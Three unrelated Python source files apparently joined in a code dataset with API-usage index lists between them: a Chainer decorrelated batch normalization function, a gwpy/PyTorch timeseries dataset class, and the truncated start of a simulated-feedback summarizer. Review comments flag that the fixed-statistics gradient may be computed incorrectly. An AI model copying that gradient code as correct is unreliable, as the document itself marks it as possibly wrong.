        # Regroup the input into (g, C, m): one row of m samples per channel.
        # (g, C, m)
        x_hat = x.transpose((1, 0) + spatial_axis).reshape(g, C, m)
        # Center each group over the batch and spatial samples.
        mean = x_hat.mean(axis=2, keepdims=True)
        x_hat = x_hat - mean
        # Cast eps to the input dtype so the covariance keeps that dtype.
        self.eps = x.dtype.type(self.eps)
        eps_matrix = self.eps * xp.eye(C, dtype=x.dtype)
        # Regularized covariance of each group: x_hat x_hat^T / m + eps * I.
        cov = _matmul(
            x_hat, x_hat.transpose(0, 2, 1),
            xp) / x.dtype.type(m) + eps_matrix
        # (g, C), (g, C, C)
        self.eigvals, self.eigvectors = _eigh(cov, xp)
        # U = Lambda^{-1/2} E^T maps x_hat to PCA-whitened coordinates.
        U = _matmul(
            _diag(self.eigvals ** -0.5, xp),
            self.eigvectors.transpose(0, 2, 1),
            xp)
        self.y_hat_pca = _matmul(U, x_hat, xp)  # PCA whitening
        # ZCA whitening: rotate back with the eigenvector basis.
        y_hat = _matmul(self.eigvectors, self.y_hat_pca, xp)
        # Restore the original (batch, channel, *spatial) layout.
        y = y_hat.reshape((c, b) + x_shape[2:]).transpose(
            (1, 0) + spatial_axis)
        # Update running statistics
        if self.running_mean is not None:
            mean = mean.squeeze(axis=2)
            self.running_mean *= self.decay
            self.running_mean += (1 - self.decay) * mean
        if self.running_projection is not None:
            adjust = m / max(m - 1., 1.)  # unbiased estimation
            self.running_projection *= self.decay
            projection = _matmul(self.eigvectors, U, xp)
            self.running_projection += (1 - self.decay) * adjust * projection
        return y,

    def backward(self, indexes, grad_outputs):
        gy, = grad_outputs
        # The gradient reuses the eigendecomposition saved during forward.
        f = DecorrelatedBatchNormalizationGrad(
            self.groups, self.eigvals, self.eigvectors, self.y_hat_pca)
        return f.apply((gy,))
class DecorrelatedBatchNormalizationGrad(function_node.FunctionNode):

    """Backward computation of decorrelated batch normalization.

    Propagates the output gradient through the ZCA whitening, including the
    dependence of the eigendecomposition on the input
    (see https://arxiv.org/abs/1804.08450).
    """

    def __init__(self, groups, eigvals, eigvectors, y_hat_pca):
        # Quantities saved from the forward pass.
        self.groups = groups
        self.eigvals = eigvals
        self.eigvectors = eigvectors
        self.y_hat_pca = y_hat_pca

    def forward(self, inputs):
        self.retain_inputs(())
        gy = inputs[0]
        xp = backend.get_array_module(gy)
        gy_shape = gy.shape
        b, c = gy_shape[:2]
        g = self.groups
        C = c // g
        spatial_axis, m = _calc_axis_and_m(gy_shape, b)
        arange_C = numpy.arange(C)
        # Fancy-index triple selecting the diagonal of each (C, C) block.
        diag_indices = slice(None), arange_C, arange_C
        # Bring the incoming gradient into the grouped (g, C, m) layout.
        gy_hat = gy.transpose((1, 0) + spatial_axis).reshape(g, C, m)
        eigvectors = self.eigvectors
        eigvals = self.eigvals
        y_hat_pca = self.y_hat_pca
        # Rotate the gradient into PCA coordinates.
        gy_hat_pca = _matmul(eigvectors.transpose(0, 2, 1), gy_hat, xp)
        f = gy_hat_pca.mean(axis=2, keepdims=True)
        # K[i, j] becomes 1 / (lambda_i - lambda_j) where the eigenvalues
        # differ, and stays 0 where they coincide.
        K = eigvals[:, :, None] - eigvals[:, None, :]
        valid = K != 0  # to avoid nan, use eig_i != eig_j instead of i != j
        K[valid] = xp.reciprocal(K[valid])
        V = _diag(eigvals, xp)
        V_sqrt = _diag(eigvals ** 0.5, xp)
        V_invsqrt = _diag(eigvals ** -0.5, xp)
        # Correlation between the PCA-space gradient and activations.
        F_c = _matmul(
            gy_hat_pca, y_hat_pca.transpose(0, 2, 1),
            xp) / gy.dtype.type(m)
        # M keeps only the diagonal of F_c.
        M = xp.zeros_like(F_c)
        M[diag_indices] = F_c[diag_indices]
        mat = K.transpose(0, 2, 1) * (
            _matmul(V, F_c.transpose(0, 2, 1), xp)
            + _matmul(_matmul(V_sqrt, F_c, xp), V_sqrt, xp)
        )
        # Symmetrize the eigenvector-derivative contribution.
        S = mat + mat.transpose(0, 2, 1)
        R = gy_hat_pca - f + _matmul(
            (S - M).transpose(0, 2, 1), y_hat_pca, xp)
        # Map back from PCA coordinates to the input space.
        gx_hat = _matmul(
            _matmul(R.transpose(0, 2, 1), V_invsqrt, xp),
            eigvectors.transpose(0, 2, 1), xp
        ).transpose(0, 2, 1)
        # Restore the original (batch, channel, *spatial) layout.
        gx = gx_hat.reshape((c, b) + gy_shape[2:]).transpose(
            (1, 0) + spatial_axis)
        self.retain_outputs(())
        return gx,

    def backward(self, inputs, grad_outputs):
        # TODO(crcrpar): Implement this.
        raise NotImplementedError('Double backward is not implemented for'
                                  ' decorrelated batch normalization.')
class FixedDecorrelatedBatchNormalization(function_node.FunctionNode):

    """Decorrelated batch normalization with caller-supplied statistics.

    Test-time variant: the per-group mean and whitening projection are given
    as inputs instead of being estimated from the current mini-batch.
    """

    def __init__(self, groups):
        # Number of channel groups whitened independently.
        self.groups = groups

    def check_type_forward(self, in_types):
        # Three floating-point inputs of matching dtype: x, mean, projection.
        type_check.expect(in_types.size() == 3)
        x_type, mean_type, var_type = in_types
        type_check.expect(
            x_type.dtype.kind == 'f',
            mean_type.dtype == x_type.dtype,
            var_type.dtype == x_type.dtype,
        )
        type_check.expect(
            x_type.ndim >= 2,
        )

    def forward(self, inputs):
        # Inputs are retained so backward can recompute its products.
        self.retain_inputs((0, 1, 2))
        x, mean, projection = inputs
        xp = backend.get_array_module(x)
        x_shape = x.shape
        b, c = x_shape[:2]
        g = self.groups
        C = c // g
        spatial_axis, m = _calc_axis_and_m(x_shape, b)
        # Regroup to (g, C, m), subtract the fixed mean, and apply the fixed
        # whitening projection.
        x_hat = x.transpose((1, 0) + spatial_axis).reshape(g, C, m)
        x_hat = x_hat - xp.expand_dims(mean, axis=2)
        y_hat = _matmul(projection, x_hat, xp)
        # Restore the original (batch, channel, *spatial) layout.
        y = y_hat.reshape((c, b) + x_shape[2:]).transpose(
            (1, 0) + spatial_axis)
        return y,

    def backward(self, indexes, grad_outputs):
        x, mean, projection = self.get_retained_inputs()
        gy, = grad_outputs
        f = FixedDecorrelatedBatchNormalizationGrad(self.groups)
        return f.apply((x, mean, projection, gy))
class FixedDecorrelatedBatchNormalizationGrad(function_node.FunctionNode):

    """Backward computation for fixed decorrelated batch normalization.

    Returns the gradients w.r.t. the input, the fixed mean, and the fixed
    projection matrix.
    """

    def __init__(self, groups):
        self.groups = groups

    def forward(self, inputs):
        self.retain_inputs(())
        x, mean, projection, gy = inputs
        xp = backend.get_array_module(x)
        gy_shape = gy.shape
        b, c = gy_shape[:2]
        g = self.groups
        C = c // g
        spatial_axis, m = _calc_axis_and_m(gy_shape, b)
        # Regroup gradient and input into the (g, C, m) layout.
        gy_hat = gy.transpose((1, 0) + spatial_axis).reshape(g, C, m)
        x_hat = x.transpose((1, 0) + spatial_axis).reshape(g, C, m)
        # Gradient w.r.t. x: rotate gy back through the projection.
        gy_hat_pca = _matmul(projection.transpose(0, 2, 1), gy_hat, xp)
        gx = gy_hat_pca.reshape((c, b) + gy_shape[2:]).transpose(
            (1, 0) + spatial_axis)
        # rhs is the centered input.
        rhs = x_hat - xp.expand_dims(mean, axis=2)
        # NOTE(review): `x_hat - rhs` algebraically reduces to the broadcast
        # mean, so the projection gradient is taken against the mean rather
        # than the centered activations (`rhs`) -- confirm against the
        # reference derivation.
        gprojection = _matmul((x_hat - rhs).transpose(0, 2, 1), gy_hat, xp)
        # NOTE(review): only the first sample column contributes to gmean;
        # verify this is intentional.
        gmean = -gy_hat_pca[..., 0]
        self.retain_outputs(())
        return gx, gmean, gprojection

    def backward(self, inputs, grad_outputs):
        # TODO(crcrpar): Implement this.
        raise NotImplementedError('Double backward is not implemented for'
                                  ' fixed decorrelated batch normalization.')
def decorrelated_batch_normalization(x, **kwargs):
    """decorrelated_batch_normalization(x, *, groups=16, eps=2e-5, \
running_mean=None, running_projection=None, decay=0.9)
    Decorrelated batch normalization function.
    It takes the input variable ``x`` and normalizes it using
    batch statistics to make the output zero-mean and decorrelated.
    Args:
        x (:class:`~chainer.Variable`): Input variable.
        groups (int): Number of groups to use for group whitening.
        eps (float): Epsilon value for numerical stability.
        running_mean (:ref:`ndarray`): Expected value of the mean. This is a
            running average of the mean over several mini-batches using
            the decay parameter. If ``None``, the expected mean is initialized
            to zero.
        running_projection (:ref:`ndarray`):
            Expected value of the project matrix. This is a
            running average of the projection over several mini-batches using
            the decay parameter. If ``None``, the expected projected is
            initialized to the identity matrix.
        decay (float): Decay rate of moving average. It is used during
            training.
    Returns:
        ~chainer.Variable: The output variable which has the same shape as
        :math:`x`.
    See: `Decorrelated Batch Normalization <https://arxiv.org/abs/1804.08450>`_
    .. seealso:: :class:`~chainer.links.DecorrelatedBatchNormalization`
    """
    # Unpack the keyword-only arguments with their documented defaults.
    parsed = argument.parse_kwargs(
        kwargs, ('groups', 16), ('eps', 2e-5), ('running_mean', None),
        ('running_projection', None), ('decay', 0.9))
    groups, eps, running_mean, running_projection, decay = parsed
    func = DecorrelatedBatchNormalization(
        groups, eps, running_mean, running_projection, decay)
    y, = func.apply((x,))
    return y
def fixed_decorrelated_batch_normalization(x, mean, projection, groups=16):
    """Decorrelated batch normalization function with fixed statistics.
    This is a variant of decorrelated batch normalization, where the mean and
    projection statistics are given by the caller as fixed variables. This is
    used in testing mode of the decorrelated batch normalization layer, where
    batch statistics cannot be used for prediction consistency.
    Args:
        x (:class:`~chainer.Variable`): Input variable.
        mean (:class:`~chainer.Variable` or :ref:`ndarray`):
            Shifting parameter of input.
        projection (:class:`~chainer.Variable` or :ref:`ndarray`):
            Projection matrix for decorrelation of input.
        groups (int): Number of groups to use for group whitening.
    Returns:
        ~chainer.Variable: The output variable which has the same shape as
        :math:`x`.
    .. seealso::
        :func:`~chainer.functions.decorrelated_batch_normalization`,
        :class:`~chainer.links.DecorrelatedBatchNormalization`
    """
    func = FixedDecorrelatedBatchNormalization(groups)
    y, = func.apply((x, mean, projection))
    return y
| [
"chainer.utils.argument.parse_kwargs",
"numpy.arange",
"chainer.backend.get_array_module",
"chainer.utils.type_check.expect"
] | [((1025, 1041), 'numpy.arange', 'numpy.arange', (['s1'], {}), '(s1)\n', (1037, 1041), False, 'import numpy\n'), ((10230, 10366), 'chainer.utils.argument.parse_kwargs', 'argument.parse_kwargs', (['kwargs', "('groups', 16)", "('eps', 2e-05)", "('running_mean', None)", "('running_projection', None)", "('decay', 0.9)"], {}), "(kwargs, ('groups', 16), ('eps', 2e-05), (\n 'running_mean', None), ('running_projection', None), ('decay', 0.9))\n", (10251, 10366), False, 'from chainer.utils import argument\n'), ((1809, 1888), 'chainer.utils.type_check.expect', 'type_check.expect', (["(x_type.dtype.kind == 'f')", '(x_type.shape[1] % self.groups == 0)'], {}), "(x_type.dtype.kind == 'f', x_type.shape[1] % self.groups == 0)\n", (1826, 1888), False, 'from chainer.utils import type_check\n'), ((1932, 1967), 'chainer.utils.type_check.expect', 'type_check.expect', (['(x_type.ndim >= 2)'], {}), '(x_type.ndim >= 2)\n', (1949, 1967), False, 'from chainer.utils import type_check\n'), ((2089, 2116), 'chainer.backend.get_array_module', 'backend.get_array_module', (['x'], {}), '(x)\n', (2113, 2116), False, 'from chainer import backend\n'), ((4237, 4265), 'chainer.backend.get_array_module', 'backend.get_array_module', (['gy'], {}), '(gy)\n', (4261, 4265), False, 'from chainer import backend\n'), ((4440, 4455), 'numpy.arange', 'numpy.arange', (['C'], {}), '(C)\n', (4452, 4455), False, 'import numpy\n'), ((6416, 6528), 'chainer.utils.type_check.expect', 'type_check.expect', (["(x_type.dtype.kind == 'f')", '(mean_type.dtype == x_type.dtype)', '(var_type.dtype == x_type.dtype)'], {}), "(x_type.dtype.kind == 'f', mean_type.dtype == x_type.dtype,\n var_type.dtype == x_type.dtype)\n", (6433, 6528), False, 'from chainer.utils import type_check\n'), ((6580, 6615), 'chainer.utils.type_check.expect', 'type_check.expect', (['(x_type.ndim >= 2)'], {}), '(x_type.ndim >= 2)\n', (6597, 6615), False, 'from chainer.utils import type_check\n'), ((6759, 6786), 'chainer.backend.get_array_module', 
'backend.get_array_module', (['x'], {}), '(x)\n', (6783, 6786), False, 'from chainer import backend\n'), ((7726, 7753), 'chainer.backend.get_array_module', 'backend.get_array_module', (['x'], {}), '(x)\n', (7750, 7753), False, 'from chainer import backend\n')] |
import h5py
import copy
from collections import OrderedDict
import numpy as np
import torch
from gwpy.timeseries import TimeSeries, TimeSeriesDict
from .signal import bandpass
class TimeSeriesDataset:
    """Torch-style dataset holding a multichannel timeseries.

    Attributes:
        data: array of shape (n_channels, n_samples) with channel values.
        channels: array of channel names, sorted alphabetically and aligned
            with the rows of ``data``.
        t0: start time of the stored segment.
        fs: sampling rate in Hz.
        target_idx: row index of the target channel within ``data``.
    """
    def __init__(self):
        """Initialize empty attributes."""
        self.data = []
        self.channels = []
        self.t0 = 0.
        self.fs = 1.
        self.target_idx = None
    def fetch(self, channels, t0, duration, fs, nproc=4):
        """Fetch channel data via gwpy and store it sorted by channel name.

        Args:
            channels: list of channel names (or path to a file with one name
                per line). The FIRST entry is the target channel. Names
                containing 'FAKE_SINE_FREQ' are synthesized as sinusoids
                instead of being fetched.
            t0: segment start time (passed to gwpy).
            duration: segment length in seconds.
            fs: sampling rate to resample every channel to.
            nproc: number of processes used by gwpy.
        """
        # if channels is a file
        if isinstance(channels, str):
            channels = open(channels).read().splitlines()
        target_channel = channels[0]
        # split into real channels (fetched) and fake sinusoid channels
        channels, fake_chans = self.categorize_channels (channels)
        # get data and resample
        data = TimeSeriesDict.get(channels, t0, t0 + duration, nproc=nproc,
                                 allow_tape=True)
        data = self.add_fake_sinusoids (data, fake_chans, t0, duration, fs )
        data = data.resample(fs)
        # sorted by channel name
        data = OrderedDict(sorted(data.items()))
        # reset attributes
        self.data = []
        self.channels = []
        for chan, ts in data.items():
            self.data.append(ts.value)
            self.channels.append(chan)
        self.data = np.stack(self.data)
        self.channels = np.stack(self.channels)
        self.t0 = t0
        self.fs = fs
        # locate the target channel in the sorted channel array
        self.target_idx = np.where(self.channels == target_channel)[0][0]
    def categorize_channels (self, channels):
        """Split channel names into real channels and fake sinusoid channels.

        A name containing 'FAKE_SINE_FREQ' is fake; empty strings are
        dropped. Returns (real_chans, fake_chans).
        """
        real_chans = []
        fake_chans = []
        for i in range(len(channels)):
            channel = channels[i]
            if 'FAKE_SINE_FREQ' in channel:
                fake_chans.append(channel)
            else:
                if channel != '':
                    real_chans.append(channel)
        return real_chans, fake_chans
    def add_fake_sinusoids (self, data, fake_chans, t0, duration, fs ):
        """The dict 'data' is modified with fake timeseries.

        The sinusoid frequency is parsed from the channel name: the token
        after the last '_' and before 'HZ', with 'POINT' as the decimal
        separator (e.g. '..._1POINT5HZ' -> 1.5 Hz).
        """
        for chan in fake_chans:
            f0 = float(chan.split('_')[-1].split('HZ')[0].replace('POINT', '.'))
            time = np.linspace(t0, t0 + duration, int(duration*fs))
            sine_2pi_ft = np.sin(2*np.pi*f0*time)
            fake_ts = TimeSeries(sine_2pi_ft, t0=t0, sample_rate=fs, name=chan, unit="ct", channel=chan)
            data[chan] = fake_ts
        return data
    def read(self, fname, channels, group=None):
        """Read data from HDF5 format (as written by :meth:`write`).

        Args:
            fname: HDF5 file path.
            channels: list of channel names (or path to a file with one name
                per line); the first entry is the target channel. Datasets
                not listed here are skipped.
            group: optional HDF5 group name to read from.
        """
        # if channels is a file
        if isinstance(channels, str):
            channels = open(channels).read().splitlines()
        target_channel = channels[0]
        # read data from HDF5 file
        self.data = []
        self.channels = []
        with h5py.File(fname, 'r') as f:
            if group is not None:
                fobj = f[group]
            else:
                fobj = f
            for chan, data in fobj.items():
                if chan not in channels:
                    continue
                self.channels.append(chan)
                self.data.append(data[:])
                # NOTE: t0/fs are taken from whichever dataset is read last;
                # all channels are assumed to share the same values
                self.t0 = data.attrs['t0']
                self.fs = data.attrs['sample_rate']
        self.data = np.stack(self.data)
        self.channels = np.stack(self.channels)
        # sorted by channel name
        sorted_indices = np.argsort(self.channels)
        self.channels = self.channels[sorted_indices]
        self.data = self.data[sorted_indices]
        self.target_idx = np.where(self.channels == target_channel)[0][0]
    def write(self, fname, group=None, write_mode='w'):
        """Write to HDF5 format. Can be read directly by gwpy.timeseries.TimeSeriesDict."""
        with h5py.File(fname, write_mode) as f:
            # write to group if group is given
            if group is not None:
                fobj = f.create_group(group)
            else:
                fobj = f
            for chan, ts in zip(self.channels, self.data):
                dset = fobj.create_dataset(chan, data=ts, compression='gzip')
                # attributes mirror what gwpy expects on a TimeSeries dataset
                dset.attrs['sample_rate'] = self.fs
                dset.attrs['t0'] = self.t0
                dset.attrs['channel'] = str(chan)
                dset.attrs['name'] = str(chan)
    def bandpass(self, fl, fh, order=8, channels=None):
        """Return a bandpass-filtered copy of the dataset.

        Args:
            fl, fh: low/high corner frequencies (lists collapse to their
                first/last element respectively).
            order: filter order passed to the module-level ``bandpass``.
            channels: which channels to filter -- 'all', 'target', 'aux',
                a list of channel names, or None (no filtering).
        """
        if isinstance(fl, (list, tuple)):
            fl = fl[0]
        if isinstance(fh, (list, tuple)):
            fh = fh[-1]
        # create a copy of the class
        new = self.copy()
        # bandpassing
        if isinstance(channels, str):
            if channels == 'all':
                new.data = bandpass(new.data, self.fs, fl, fh, order)
            elif channels == 'target':
                new.data[new.target_idx] = bandpass(
                    new.data[new.target_idx], self.fs, fl, fh, order)
            elif channels == 'aux':
                # every channel except the target
                for i, d in enumerate(new.data):
                    if i == new.target_idx:
                        continue
                    new.data[i] = bandpass(d, self.fs, fl, fh, order)
        elif isinstance(channels, list):
            for i, (chan, d) in enumerate(zip(new.channels, new.data)):
                if chan not in channels:
                    continue
                new.data[i] = bandpass(d, self.fs, fl, fh, order)
        return new
    def normalize(self, mean=None, std=None):
        """Return a copy with data normalized by mean and std.

        Defaults to the per-channel mean/std of this dataset.
        """
        if mean is None:
            mean = self.mean
        if std is None:
            std = self.std
        new = self.copy()
        new.data = (new.data - mean) / std
        return new
    def copy(self):
        """Return a deep copy of this dataset."""
        return copy.deepcopy(self)
    def get(self, channels):
        """Return the data rows of the given channels, stacked in storage order."""
        data = []
        for chan, d in zip(self.channels, self.data):
            if chan not in channels:
                continue
            data.append(d)
        data = np.stack(data)
        return data
    def get_target(self):
        """Return the data row of the target channel."""
        return self.data[self.target_idx]
    @property
    def mean(self):
        """Return the mean of each channel (shape (n_channels, 1))."""
        return self.data.mean(axis=-1, keepdims=True)
    @property
    def std(self):
        """Return the std of each channel (shape (n_channels, 1))."""
        return self.data.std(axis=-1, keepdims=True)
    @property
    def n_channels(self):
        """Return the number of channels."""
        return len(self.channels)
class TimeSeriesSegmentDataset(TimeSeriesDataset):
    """Timeseries dataset that serves fixed-length, strided windows.

    Each item is an ``(aux, target)`` pair of Tensors cut from the stored
    multichannel data; the last window is padded when it falls short.
    """
    def __init__(self, kernel, stride, pad_mode='median'):
        """Store windowing parameters (kernel/stride in seconds)."""
        super().__init__()
        self.kernel = kernel
        self.stride = stride
        self.pad_mode = pad_mode
    def __len__(self):
        """Number of windows reachable with the configured stride."""
        total = self.data.shape[-1]
        win = int(self.kernel * self.fs)
        hop = int(self.stride * self.fs)
        count = int(np.ceil((total - win) / hop) + 1)
        return count if count > 0 else 0
    def __getitem__(self, idx):
        """Return the (aux, target) Tensor pair for window ``idx``."""
        size = self.__len__()
        # support negative indexing; out-of-range raises IndexError
        if idx < 0:
            idx += size
        if idx >= size:
            raise IndexError(
                f'index {idx} is out of bound with size {size}.')
        win = int(self.kernel * self.fs)
        hop = int(self.stride * self.fs)
        start = idx * hop
        segment = self.data[:, start: start + win].copy()
        # pad the trailing edge if the final window is short
        missing = win - segment.shape[-1]
        if missing > 0:
            segment = np.pad(segment, ((0, 0), (0, missing)), mode=self.pad_mode)
        # split into target HOFT and auxiliary channels
        target = torch.Tensor(segment[self.target_idx])
        aux = torch.Tensor(np.delete(segment, self.target_idx, axis=0))
        return aux, target
| [
"numpy.stack",
"numpy.pad",
"copy.deepcopy",
"h5py.File",
"gwpy.timeseries.TimeSeriesDict.get",
"numpy.ceil",
"numpy.argsort",
"torch.Tensor",
"numpy.sin",
"numpy.where",
"numpy.delete",
"gwpy.timeseries.TimeSeries"
] | [((817, 894), 'gwpy.timeseries.TimeSeriesDict.get', 'TimeSeriesDict.get', (['channels', 't0', '(t0 + duration)'], {'nproc': 'nproc', 'allow_tape': '(True)'}), '(channels, t0, t0 + duration, nproc=nproc, allow_tape=True)\n', (835, 894), False, 'from gwpy.timeseries import TimeSeries, TimeSeriesDict\n'), ((1339, 1358), 'numpy.stack', 'np.stack', (['self.data'], {}), '(self.data)\n', (1347, 1358), True, 'import numpy as np\n'), ((1383, 1406), 'numpy.stack', 'np.stack', (['self.channels'], {}), '(self.channels)\n', (1391, 1406), True, 'import numpy as np\n'), ((3284, 3303), 'numpy.stack', 'np.stack', (['self.data'], {}), '(self.data)\n', (3292, 3303), True, 'import numpy as np\n'), ((3328, 3351), 'numpy.stack', 'np.stack', (['self.channels'], {}), '(self.channels)\n', (3336, 3351), True, 'import numpy as np\n'), ((3419, 3444), 'numpy.argsort', 'np.argsort', (['self.channels'], {}), '(self.channels)\n', (3429, 3444), True, 'import numpy as np\n'), ((5863, 5882), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (5876, 5882), False, 'import copy\n'), ((6153, 6167), 'numpy.stack', 'np.stack', (['data'], {}), '(data)\n', (6161, 6167), True, 'import numpy as np\n'), ((8181, 8221), 'numpy.delete', 'np.delete', (['data', 'self.target_idx'], {'axis': '(0)'}), '(data, self.target_idx, axis=0)\n', (8190, 8221), True, 'import numpy as np\n'), ((8282, 8302), 'torch.Tensor', 'torch.Tensor', (['target'], {}), '(target)\n', (8294, 8302), False, 'import torch\n'), ((8317, 8334), 'torch.Tensor', 'torch.Tensor', (['aux'], {}), '(aux)\n', (8329, 8334), False, 'import torch\n'), ((2268, 2297), 'numpy.sin', 'np.sin', (['(2 * np.pi * f0 * time)'], {}), '(2 * np.pi * f0 * time)\n', (2274, 2297), True, 'import numpy as np\n'), ((2314, 2400), 'gwpy.timeseries.TimeSeries', 'TimeSeries', (['sine_2pi_ft'], {'t0': 't0', 'sample_rate': 'fs', 'name': 'chan', 'unit': '"""ct"""', 'channel': 'chan'}), "(sine_2pi_ft, t0=t0, sample_rate=fs, name=chan, unit='ct',\n channel=chan)\n", (2324, 
2400), False, 'from gwpy.timeseries import TimeSeries, TimeSeriesDict\n'), ((2820, 2841), 'h5py.File', 'h5py.File', (['fname', '"""r"""'], {}), "(fname, 'r')\n", (2829, 2841), False, 'import h5py\n'), ((3798, 3826), 'h5py.File', 'h5py.File', (['fname', 'write_mode'], {}), '(fname, write_mode)\n', (3807, 3826), False, 'import h5py\n'), ((8010, 8062), 'numpy.pad', 'np.pad', (['data', '((0, 0), (0, pad))'], {'mode': 'self.pad_mode'}), '(data, ((0, 0), (0, pad)), mode=self.pad_mode)\n', (8016, 8062), True, 'import numpy as np\n'), ((1475, 1516), 'numpy.where', 'np.where', (['(self.channels == target_channel)'], {}), '(self.channels == target_channel)\n', (1483, 1516), True, 'import numpy as np\n'), ((3571, 3612), 'numpy.where', 'np.where', (['(self.channels == target_channel)'], {}), '(self.channels == target_channel)\n', (3579, 3612), True, 'import numpy as np\n'), ((7219, 7253), 'numpy.ceil', 'np.ceil', (['((nsamp - kernel) / stride)'], {}), '((nsamp - kernel) / stride)\n', (7226, 7253), True, 'import numpy as np\n')] |
from __future__ import print_function
import json
import itertools
import re
import os.path as path
import sys
sys.path.append(path.dirname(path.dirname(path.dirname(path.abspath(__file__)))))
import tempfile
import random
import numpy as np
import pulp
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
from sklearn import svm
from summarizer.algorithms.feedback_graph import SimpleNgramFeedbackGraph, PageRankFeedbackGraph
from summarizer.algorithms.flight_recorder import FlightRecorder, Record
from summarizer.baselines import sume
from summarizer.baselines.sume_wrap import SumeWrap
from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, \
prune_phrases
RECOMMENDER_METHOD_SAMPLING = "SAMPLING"
RECOMMENDER_METHOD_HIGHEST_WEIGHT = "HIGHEST_WEIGHT"
PARSE_TYPE_PARSE = 'parse'
ORACLE_TYPE_CUSTOM_WEIGHT = 'CUSTOM_WEIGHT'
ORACLE_TYPE_TOP_N = 'top_n'
ORACLE_TYPE_KEEPTRACK = 'keeptrack'
ORACLE_TYPE_ACTIVE_LEARNING = 'active_learning'
ORACLE_TYPE_ACTIVE_LEARNING2 = 'active_learning2'
ORACLE_TYPE_ILP_FEEDBACK = "ilp_feedback"
ORACLE_TYPE_ACCEPT_REJECT = 'accept_reject'
ORACLE_TYPE_ACCEPT = 'accept'
ORACLE_TYPE_REJECT = 'reject'
ORACLE_TYPE_ACCEPT_ALL = 'accept_all'
ORACLE_TYPE_REJECT_ALL = 'reject_all'
CHANGE_WEIGHT_MODE_ACCEPT = 'accept'
CHANGE_WEIGHT_MODE_REJECT = 'reject'
CHANGE_WEIGHT_MODE_IMPLICIT_REJECT = 'implicit_reject'
from summarizer.utils.writer import write_to_file
class Oracle():
    """Simulated user that judges summary concepts by peeking at the
    reference-summary concept set."""

    def reject_concepts(self, summ_concepts, ref_concepts):
        """Return summary concepts that do NOT occur in the references.

        Example: summ ['1 2', '2 4'] vs refs {'1 2', '2 3', '3 4'}
        gives {'2 4'}.
        """
        return set(summ_concepts).difference(ref_concepts)

    def accept_concepts(self, summ_concepts, ref_concepts):
        """Return summary concepts that also occur in the references.

        Example: summ ['1 2', '2 4'] vs refs {'1 2', '2 3', '3 4'}
        gives {'1 2'}.
        """
        return set(summ_concepts).intersection(ref_concepts)
class SimulatedFeedback(object):
def __init__(self, language, rouge, embeddings={}, fvector=[], ngrams_size=2, top_n=100, dump_base_dir=tempfile.mkdtemp(prefix="simufee-")):
'''
Initialize the docs and models structure
'''
self.Oracle = Oracle() # oracle
self.SumeWrap = SumeWrap(language) # only used to load the sentences and push them into self.summarizer
self.summarizer = sume.ConceptBasedILPSummarizer(" ", language)
self.N = ngrams_size # how many words an should the ngrams consist of
self.top_n = top_n # currently unused
self.ref_ngrams = set() # set of ngrams that are in the reference summaries (for the feedback to peek)
self.ref_phrases = set() # set of phrases that are in the reference summaries (for the feedback to peek)
self.flight_recorder = FlightRecorder() # The flight-recorder stores all interactions wrt to concepts (eg. accepted, and rejected)
self.info_data = [] # stats for the pipeline. The only thing that leaves this class
self.initial_weights = {} # oracle reweighting
self.language = language # document language. relevant for stemmer, embeddings, stopwords, parsing
#self.stemmer = SnowballStemmer(self.language)
if self.language == "english":
self.stemmer = SnowballStemmer(self.language)
#elf.stemmer = WordNetLemmatizer()
else:
self.stemmer = SnowballStemmer(self.language)
self.stoplist = set(stopwords.words(self.language))
self.rouge = rouge
self.cluster_size = 0.0
self.embeddings = embeddings # word2vec embeddings
self.fvector = fvector # List of support vectors for active learning SVM
self.pos_hash = {} # active learning // SVM
self.concept_vec_idx = {} # active learning // SVM
self.index_vec_concept = {} # active learning // SVM
### previously uninitialized fields...
self.data = None # np.array(self.fvector) # active learning // SVM TODO rename self.data to somehting that contains svm...
self.labels = None # active learning // SVM
self.MAX_WEIGHT = None # int with # of documents (i.e. largest possible DF value)
self.models = None # reference summaries, only needed for rouge score (as they are converted merged into one large summary)
self.parse_type = None # None or "parse"
self.prev_score = None # rouge scores of previous iteration.
self.score = None # rouge scores of current iteration.
self.summary_length = None # target summary length.
self.ub_score = None # rouge scores of upper bound
self.uncertainity = {} # active learning // SVM
# graph based propagation settings
self.graph = PageRankFeedbackGraph(self.stemmer, self.language)
# self.graph = SimpleNgramFeedbackGraph(self.stemmer, self.language, N=5)
self.debug_dump_target_dir = dump_base_dir
self.allowed_number_of_feedback_per_iteration=5
def get_sorted_concepts(self):
'''
Get sorted concepts
'''
sorted_concepts = sorted(self.summarizer.weights,
key=lambda x: self.summarizer.weights[x],
reverse=True)
# iterates over the concept weights
return sorted_concepts
def get_implicit_feedback(self, summ_ngrams, list_concepts):
feedback_keys = []
for key in summ_ngrams:
for phrase in list_concepts:
if re.search(u'(\s|^)%s([\s]|$)' % (key), u'%s' % (phrase)) or re.search(u'(\s|^)%s([\s]|$)' % (phrase),
u'%s' % (key)):
# print(key, phrase)
feedback_keys.append(key)
implicit_feedback = set(summ_ngrams) - set(feedback_keys)
return implicit_feedback
    def get_feedback(self, subset, recommender=None):
        """
        Generate feedback for the subset sentences by peeking into the reference summary.

        :param subset: indices (into self.summarizer.sentences) of the summary
            sentences to collect feedback for.
        :param recommender: how to pick the concepts shown to the oracle:
            None (all), RECOMMENDER_METHOD_SAMPLING (random sample) or
            RECOMMENDER_METHOD_HIGHEST_WEIGHT (highest graph weights); the
            latter two are capped at
            self.allowed_number_of_feedback_per_iteration concepts.
        :return: tuple (new_accepts, new_rejects, new_implicit_rejects) of
            concepts not already present in the flight recorder.
        """
        new_implicit_rejects = set() # currently not used (all writing occurences are commented out)
        summary = [self.summarizer.sentences[j].untokenized_form for j in subset]
        # print('Feedback-optimal summary:', summary)
        if self.parse_type == 'parse':
            print('feedback on phrases')
            summary_phrases = [self.summarizer.sentences[j].phrases for j in subset]
            samples = list(itertools.chain(*summary_phrases))
            references=self.ref_phrases
        elif self.parse_type == None:
            print('feedback on ngrams')
            summary_concepts = [self.summarizer.sentences[j].concepts for j in subset]
            samples = list(itertools.chain(*summary_concepts))
            references = self.ref_ngrams
        # NOTE(review): `samples`/`references` stay unbound when parse_type is
        # neither 'parse' nor None, and `use_samples` stays unbound for an
        # unrecognized recommender -- either case raises UnboundLocalError
        # below; confirm callers never pass other values.
        # from all samples, use a sub-set
        if recommender is None:
            use_samples = samples
